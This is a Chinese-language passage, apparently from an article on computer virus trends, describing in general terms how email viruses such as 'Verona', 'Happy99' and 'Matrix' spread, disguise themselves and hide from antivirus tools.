过去，人们的观点是“只要不打开电子邮件的附件，就不会感染病毒”。但是，新一代计算机病毒却令人震惊，例如，大名鼎鼎的“维罗纳（Verona）”病毒是一个真正意义上的“超级病毒”，它不仅主题众多，而且集邮件病毒的几大特点为一身，令人无法设防。最严重的是它将病毒写入邮件原文。这正是“维罗纳”病毒的新突破，一旦用户收到了该病毒邮件，无论是无意间用Outlook打开了该邮件，还是仅仅使用了预览，病毒就会自动发作，并将一个新的病毒邮件发送给邮件通讯录中的地址，从而迅速传播。这就使得一旦“维罗纳”类的病毒来临，用户将根本无法逃避。 该病毒本身对用户计算机系统并不造成严重危害，但是这一病毒的出现已经是病毒技术的一次巨大“飞跃”，它无疑为今后更大规模、更大危害的病毒的出现做了一次技术上的试验及预演，一旦这一技术与以往危害甚大的病毒技术或恶意程序、特洛伊木马等相结合，它可能造成的危害将是无法想象的。

5、更加隐蔽化

和过去的病毒不一样，新一代病毒更加隐蔽，主题会随用户传播而改变，而且许多病毒还会将自己装成常用的程序，或者将病毒代码写入文件内部，而文件长度不发生任何改变，使用户不会产生怀疑。例如，猖狂一时的“欢乐99”病毒本身虽是附件，却呈现为卡通的样子迷惑用户。现在，新的病毒可以将自身写入Jpg等图片中，计算机用户一旦打开图片，它就会运行某些程序将用户电脑的硬盘格式化，以后无法恢复。还有象“矩阵(matrix)”等病毒会自动隐藏、变形，甚至阻止受害用户访问反病毒网站和向病毒记录的反病毒地址发送电子邮件，无法下载经过更新、升级后的相应杀毒软件或发布病毒警告消息。